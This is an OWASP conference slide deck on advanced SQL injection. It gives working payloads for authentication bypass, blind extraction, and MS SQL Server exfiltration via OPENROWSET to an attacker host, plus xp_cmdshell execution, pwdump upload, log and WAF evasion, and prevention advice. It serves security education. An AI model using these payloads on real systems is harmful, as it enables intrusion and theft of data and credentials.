Advanced SQLi and Evasion Techniques

Owasp Indy Q2 2012 Advanced SQLi


Page 1: Owasp Indy Q2 2012 Advanced SQLi

Advanced SQLi and Evasion Techniques

Page 2: Owasp Indy Q2 2012 Advanced SQLi

About Me

Introduction

Damian Profancik | Technical Lead/Security Services Leader @ Apparatus

[email protected]

@integrisec

Page 3: Owasp Indy Q2 2012 Advanced SQLi

Credit

Cesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

ModSecurity Team – Trustwave SpiderLabs
o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Avi Douglen – OWASP Board Member, Israel
o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf

Page 4: Owasp Indy Q2 2012 Advanced SQLi

SQL Injection Basics

• Dynamic construction of SQL queries

"SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"

• Unsanitized user input

uname = ' or 1=1-- => SELECT * FROM table WHERE user = '' or 1=1-- ' AND pwd = ''

The quote in the input closes the string literal, or 1=1 makes the condition true for every row, and -- comments out the rest of the statement, so the password is never checked and the query returns every user.

• Excessive permissions
o Web application running as a privileged user with db_owner rights
o Connecting to the database as sa, dbo, or a sysadmin account
o Lax file system permissions
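As an added example (not part of the slides), the concatenated login query from the slide next to its parameterized form, run against an in-memory SQLite database with two constructed users. SQLite stands in for whatever engine the application uses; the quoting and -- comment behaviour that make the bypass work are the same in SQL Server and MySQL. Function and table names are the example's own.

```python
import sqlite3


def build_db():
    """In-memory stand-in for the application database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user TEXT, pwd TEXT);
        INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'battery staple');
    """)
    return conn


def login_vulnerable(conn, uname, pword):
    """Dynamic construction exactly as on the slide: the input is spliced into the SQL text."""
    sql = "SELECT * FROM users WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
    return sql, conn.execute(sql).fetchall()


def login_parameterized(conn, uname, pword):
    """Prepared statement: SQL text and values travel separately, so a quote or a
    comment marker inside a value can never change the statement's structure."""
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return sql, conn.execute(sql, (uname, pword)).fetchall()


def demo():
    """Run the slide's payload through both versions and report what each one did."""
    conn = build_db()
    payload = "' or 1=1-- "          # the slide's uname value (trailing space); pword left empty
    vuln_sql, vuln_rows = login_vulnerable(conn, payload, "")
    safe_sql, safe_rows = login_parameterized(conn, payload, "")
    return {
        "vulnerable_sql": vuln_sql,            # ...WHERE user = '' or 1=1-- ' AND pwd = ''
        "vulnerable_rows": len(vuln_rows),     # every user comes back: authentication bypassed
        "parameterized_sql": safe_sql,
        "parameterized_rows": len(safe_rows),  # zero rows: nobody is literally named "' or 1=1-- "
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The parameterized version is the "Prepared Statements/Parameterized Queries" item from the prevention slides; note that it needs no escaping logic at all, which is why it is the primary control rather than input filtering.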

Page 9: Owasp Indy Q2 2012 Advanced SQLi

Advanced SQLi Techniques

• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion

Page 10: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection

Page 11: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection

• Differential Analysis

No error message or data is displayed; the only signal is whether the page changes. Compare the normal response with the responses to an always-false and an always-true condition:

Example:

http://www.someforum.com/posts.php?id=2

SELECT author, title, body FROM posts WHERE ID = 2

http://www.someforum.com/posts.php?id=2 and 1=2

SELECT author, title, body FROM posts WHERE ID = 2 and 1=2

http://www.someforum.com/posts.php?id=2 and 1=1

SELECT author, title, body FROM posts WHERE ID = 2 and 1=1

If the and 1=1 page matches the original and the and 1=2 page is empty or different, the parameter is injectable, and any condition substituted for 1=1 can be answered true or false from that difference.

Page 12: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection (cont.)

• Database Management System Fingerprinting

o System Functions
• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate (no parentheses)
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() (the page comes back normally only on SQL Server; elsewhere the unknown function is an error)

o String Concatenation
• MS SQL Server = +
• MySQL = CONCAT() (+ is numeric addition; 'te'+'st' evaluates to 0)
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st' (true on SQL Server; note that MySQL also returns true here by coercing both sides to 0, so pair it with a second probe)

o Query Chaining
• MS SQL Server = allows chaining with a semicolon
• MySQL = the server accepts it, but most client APIs (for example PHP mysql_query) send one statement at a time, so stacked queries usually fail from a web application
• Oracle = does NOT allow chaining with a semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --

Page 13: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection (cont.)

• Timing Attacks

o Adding delay
• SQL Server = WAITFOR DELAY '0:0:10'
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')) (or SLEEP(10) on MySQL 5.0.12 and later; BENCHMARK's duration depends on the server's CPU, so calibrate it first)
• PostgreSQL = pg_sleep(10)
• Oracle = UNION with a query that returns a lot of rows (a heavy query), so the delay is load-dependent

o IF(condition, value_if_true, value_if_false) ties the delay to a condition (MySQL syntax; use CASE WHEN on the other engines)

Example:

…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;

A slow response means the first character of the password is CHAR(50), the digit 2; a fast one means it is not. Repeating over each position and candidate character recovers the whole value without a single byte of it being displayed.
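Added example, not part of the deck: the boolean (differential) oracle from the posts.php example and the timing oracle from this slide driving one extraction loop, against a constructed in-memory SQLite stand-in for the forum database. SQLite has no BENCHMARK or WAITFOR, so a registered sleep_if() function plays that role (an assumption of this example), and unicode()/substr() stand in for ASCII()/SUBSTRING(). It goes beyond the slide's one-character equality test by binary-searching the character's code point, which costs about seven requests per character instead of one per candidate character; the table, column and row targeted are the example's own.

```python
import sqlite3
import time

SLEEP_SECONDS = 0.1   # stand-in for WAITFOR DELAY / BENCHMARK / pg_sleep


def build_db():
    """In-memory stand-in for the database behind posts.php (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER, author TEXT, title TEXT, body TEXT);
        INSERT INTO posts VALUES (2, 'alice', 'Hello', 'first post');
        CREATE TABLE users (userid INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr');
    """)

    def sleep_if(cond):
        # Plays the role of IF(cond, BENCHMARK(...), null): delays only when cond is true.
        if cond:
            time.sleep(SLEEP_SECONDS)
        return 1

    conn.create_function("sleep_if", 1, sleep_if)
    return conn


def posts_php(conn, id_param):
    """Vulnerable handler: the id parameter is concatenated straight into the query."""
    sql = "SELECT author, title, body FROM posts WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def condition(position, boundary):
    """Injected predicate: is the code point of character `position` of the secret > boundary?
    (ASCII(SUBSTRING(password, position, 1)) > boundary in MySQL / SQL Server terms.)"""
    return ("unicode(substr((SELECT password FROM users WHERE userid = 1), %d, 1)) > %d"
            % (position, boundary))


def boolean_oracle(conn, cond):
    """Differential analysis: the post is returned only when the injected condition is true."""
    return len(posts_php(conn, "2 and " + cond)) > 0


def timing_oracle(conn, cond):
    """Timing channel: the response is slow only when the injected condition is true."""
    start = time.perf_counter()
    posts_php(conn, "2 and sleep_if(" + cond + ")")
    return time.perf_counter() - start > SLEEP_SECONDS / 2


def extract(conn, oracle, max_len=32):
    """Recover the secret one character at a time, binary-searching each code point."""
    result = ""
    for position in range(1, max_len + 1):
        lo, hi = 0, 127   # ASCII range; widen it if the column may hold other bytes
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, condition(position, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end yields '' and unicode('') is NULL, so no boundary
            # ever tests true: the secret ended at the previous position.
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    print("boolean oracle:", extract(db, boolean_oracle))
    print("timing oracle: ", extract(db, timing_oracle))
```

Against a real target the oracle functions are HTTP requests and the comparison is on response body (boolean) or round-trip time (timing); the loop above is unchanged. The timing threshold is set to half the injected delay so that network jitter does not flip answers, which is also why the delay in the slide is as long as ten seconds.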

Page 14: Owasp Indy Q2 2012 Advanced SQLi

Attacking MS SQL Server

Page 15: Owasp Indy Q2 2012 Advanced SQLi

Linked and Remote Servers

• OPENROWSET

Example:

SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table' )

• OPENDATASOURCE

Example:

SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName

Both functions open an ad hoc connection from the victim's database server to any SQL Server named in the connection string (Network=DBMSSOCN selects the TCP/IP net-library; Address gives host and port). They work only while ad hoc distributed queries are enabled: controlled by the DisallowAdhocAccess registry setting on SQL Server 2000, and by the 'Ad Hoc Distributed Queries' sp_configure option (off by default) on SQL Server 2005 and later. Everything that follows in this section rides on this outbound connection.

Page 16: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration

• Remote server INSERT

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2

The victim's server pushes every row of its table2 into table1 on the attacker's SQL Server; table1 must already exist there with a matching column count and compatible types. Nothing has to be displayed in the web application, so this works even when the injection is otherwise blind.

Page 17: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration (cont.)

Enumerate the schema first. The attacker creates receiving tables (_sysdatabases, _sysobjects, _syscolumns) whose columns mirror the victim's system tables, then copies each one across:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects')
SELECT * FROM databasename.dbo.sysobjects

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns

On SQL Server 2005 and later these names are compatibility views; sys.databases, sys.objects and sys.columns are the current catalog views and carry different columns, so build the receiving tables from the same version as the target.

Page 18: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration (cont.)

With table and column names known, copy the application data, then the logins:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysxlogins')
SELECT * FROM master.dbo.sysxlogins

sysxlogins lives in master and holds the SQL Server 2000 login password hashes; on SQL Server 2005 and later the equivalent is sys.sql_logins, whose password_hash column is visible only with CONTROL SERVER (sysadmin) rights.

Page 19: Owasp Indy Q2 2012 Advanced SQLi

Privilege Escalation

• Known vulnerabilities

Example:

SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation

Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt

• Often not required
o Connection strings using sa, dbo or a sysadmin account
o Web service context: the application already runs with every right the attacker needs

Page 20: Owasp Indy Q2 2012 Advanced SQLi

Command Execution

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'

INSERT ... EXEC captures the rows xp_cmdshell returns (one line of command output per row, a single nvarchar column) and ships them to temp_table on the attacker's server, so command output is readable even when the web page shows nothing. xp_cmdshell runs as the SQL Server service account. It is disabled by default on SQL Server 2005 and later, but a sysadmin-level connection can turn it back on with sp_configure 'xp_cmdshell', 1 (after enabling 'show advanced options').

Page 21: Owasp Indy Q2 2012 Advanced SQLi

Uploading Files

On attacker's server…

1. CREATE TABLE AttackerTable (data text)

2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

The binary is loaded, byte for byte, into the text column.

On victim's server…

3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

bcp pulls the rows back from the attacker's server and writes them out as pwdump.exe in the working directory of the SQL Server service account.

4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'

Steps 4 and 5 are the variant for when outbound 1433 is blocked: xp_regwrite registers a client alias mapping AttackersAlias to the attacker's IP on TCP port 80, and bcp connects through it.

Page 22: Owasp Indy Q2 2012 Advanced SQLi

Uploading Files (cont.)

When bcp is unavailable, write a downloader script one line at a time and run it; command output still goes to the attacker's temp_table:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC xp_cmdshell 'echo first script line >> script.vbs'

EXEC xp_cmdshell 'echo second script line >> script.vbs'

...

EXEC xp_cmdshell 'echo last script line >> script.vbs'

EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary

Each line is appended with echo and the shell's >> redirection; characters special to cmd.exe inside the script text (<, >, |, &, %) must be escaped with ^ or the shell will interpret them instead of writing them.

Page 23: Owasp Indy Q2 2012 Advanced SQLi

Internal DB Server Exploration

• Linked and Remote Servers

1. List the linked servers the compromised instance knows about:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers

2. Pivot: query the same table through the first linked server, using its four-part name:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers

3. Enumerate that server's databases:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases

4. Rinse and repeat…

Each hop runs with whatever login the linked-server definition maps to, which is frequently sa; linked servers configured with a fixed privileged login turn one injectable web application into access to every database server it can reach.

Page 24: Owasp Indy Q2 2012 Advanced SQLi

Port Scanning

Example:

SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')

The database server makes the TCP connection on the attacker's behalf, so internal hosts unreachable from the Internet can be probed. The result is read from the failure: a fast connection-refused error means the port is closed, hitting the timeout (5 seconds here) means it is filtered, and an open port that does not speak TDS produces a different error and timing. Vary Address and the port and repeat.

Page 25: Owasp Indy Q2 2012 Advanced SQLi

Evasion Techniques

Page 26: Owasp Indy Q2 2012 Advanced SQLi

Firewall Evasion

• Use port 80 for outbound

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2

The attacker's SQL Server simply listens on 80 (or whatever port the egress rules allow); the victim's server connects to it with ordinary TDS traffic, so a firewall that permits outbound web traffic from the database host lets the data out.

Page 27: Owasp Indy Q2 2012 Advanced SQLi

Log Evasion

• Inject using POST parameters (web server logs normally record the URL and query string, not the request body)

• Long HTTP requests
o IIS truncates logged requests longer than 4097 characters
o Sun-One Application Server truncates at 4092 characters

Example:

http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--

Padding the first parameter pushes the injected id past the truncation point, so the payload is missing from the log while the application still receives it in full.

Page 28: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion

• Comments
o # = single-line comment (MySQL)
o -- = single-line comment
o /* */ = inline, multi-line comment
o /*! */ = MySQL-specific inline comment; MySQL executes its contents, every other engine ignores them

Inline comments can replace the whitespace between keywords, so a signature that expects a literal space between UNION and SELECT never matches.

Example:

http://www.someforum.com/posts.php?id=2 UNION/**/SELECT * FROM…

• New line
o %0D%0A = URL-encoded CRLF
o %0B = URL-encoded vertical tab

Both are whitespace to the SQL parser, but a filter looking for a space does not treat them as one.

Example:

http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…

Page 29: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion (cont.)

• Character Encoding
o Unicode (U+02BC = ʼ, which a best-fit conversion to an 8-bit code page can turn into the ASCII apostrophe after the WAF has inspected the request)
o CHAR()
o Hexadecimal
o URL-encoding
o Double Encoding

Example:

Double Encoding (the WAF decodes once; the application decodes again):

URL = http://www.someforum.com/posts.php?id=2 UNION%252f%252a%252a%252fSELECT * FROM…

WAF = http://www.someforum.com/posts.php?id=2 UNION%2f%2a%2a%2fSELECT * FROM…

Result = http://www.someforum.com/posts.php?id=2 UNION/**/SELECT * FROM…
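Added example, not from the deck: a toy WAF that decodes once and matches a literal UNION SELECT signature, next to one that canonicalises the value first, run over constructed payloads for the double-encoding, CRLF and vertical-tab tricks above. The two-decode backend (web server, then application) is the scenario the slide assumes, not any specific product's behaviour; signature, function names and payloads are the example's own.

```python
import re
from urllib.parse import unquote

# The kind of literal, case-insensitive signature a simple blocklist WAF carries.
SIGNATURE = re.compile(r"UNION SELECT", re.IGNORECASE)
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def naive_waf_blocks(raw_param: str) -> bool:
    """Weak inspection: decode the parameter exactly once, then look for the signature."""
    return bool(SIGNATURE.search(unquote(raw_param)))


def backend_sql(raw_param: str) -> str:
    """What the database receives in the slide's scenario: the web server decodes the
    parameter once and the application decodes it again before concatenating it."""
    return "SELECT author, title, body FROM posts WHERE ID = " + unquote(unquote(raw_param))


def normalize(raw_param: str, max_rounds: int = 5) -> str:
    """Canonicalise before matching: decode until the value stops changing (bounded, so a
    hostile value cannot loop forever), replace inline comments with a space, and fold every
    whitespace run, including %0B (vertical tab) and %0D%0A, into a single space."""
    value = raw_param
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value)


def hardened_waf_blocks(raw_param: str) -> bool:
    """Inspect the canonical form, which is what the query will actually contain."""
    return bool(SIGNATURE.search(normalize(raw_param)))


# Constructed payloads, spaces sent as %20; each is one of the slide's tricks in URL form.
PAYLOADS = {
    "double-encoded comment": "2%20UNION%252f%252a%252a%252fSELECT%20*%20FROM%20users",
    "crlf": "2%20UNION%0D%0ASELECT%20*%20FROM%20users",
    "vertical tab": "2%20UNION%0BSELECT%20*%20FROM%20users",
    "plain": "2%20UNION%20SELECT%20*%20FROM%20users",
    "benign": "2",
}


def compare(payloads=PAYLOADS):
    """Return {label: (naive_blocks, hardened_blocks, sql_seen_by_backend)} for each payload."""
    return {label: (naive_waf_blocks(p), hardened_waf_blocks(p), backend_sql(p))
            for label, p in payloads.items()}


if __name__ == "__main__":
    for label, (naive, hardened, sql) in compare().items():
        print(f"{label:24} naive={naive!s:5} hardened={hardened!s:5} -> {sql}")
```

The fix is not a better regex but decoding and normalising the way the application will; a WAF that inspects a different representation of the request than the one the database executes can be bypassed by any transformation that happens between the two. The bounded decode loop matters: an unbounded one turns a long chain of %25 prefixes into a cheap denial of service against the filter itself.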

Page 30: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion (cont.)

• Concatenation
o EXEC()
o Split/Join
o Special Characters (e.g. '[', '+', '%', etc.)

Example:

Split/Join: ASP and ASP.NET join repeated parameters with a comma, so a WAF that inspects each value on its own never sees the assembled statement

URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users

WAF = id=SELECT name
id=password FROM users

ASP/ASP.Net = id=SELECT name,password FROM users

Special Characters: stray characters the platform's parser drops but the WAF inspects verbatim

URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users

WAF = id=SEL%ECT name,password FR%OM users

ASP/ASP.Net = id=SELECT name,password FROM users

The common thread is that the WAF and the application parse the request differently; a WAF has to assemble and normalize parameters exactly as the target platform does before it matches anything.


SQL Injection Prevention

Page 33: Owasp Indy Q2 2012 Advanced SQLi

SQLi Prevention

• Sanitize User Input
o Normalize input (decode it fully) before validating it, or the evasions above apply
o Whitelists
o Built-in Functions
o Regular Expressions
o Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)

• Prepared Statements/Parameterized Queries (the primary control; everything else here is defence in depth)
• Stored Procedures (only if they do not build dynamic SQL internally from concatenated strings via EXEC or sp_executesql)
• Accounts with Least Privilege (no sa or db_owner connections; no xp_cmdshell, OPENROWSET or linked-server rights for the web application's login)
• Enable the DisallowAdhocAccess registry setting for MS SQL Server (on SQL Server 2005 and later also keep the 'Ad Hoc Distributed Queries' sp_configure option at 0 and leave xp_cmdshell disabled)
• Perform Self Assessments
• Use a Web Application Firewall (it must normalize and assemble parameters the way the application does, or the evasion techniques above defeat it)
• Filter Outbound Traffic at the Firewall (the database server has no business initiating connections to the Internet on 1433, 80 or any other port; this closes the OPENROWSET and bcp exfiltration channels)

Page 34: Owasp Indy Q2 2012 Advanced SQLi

Q & A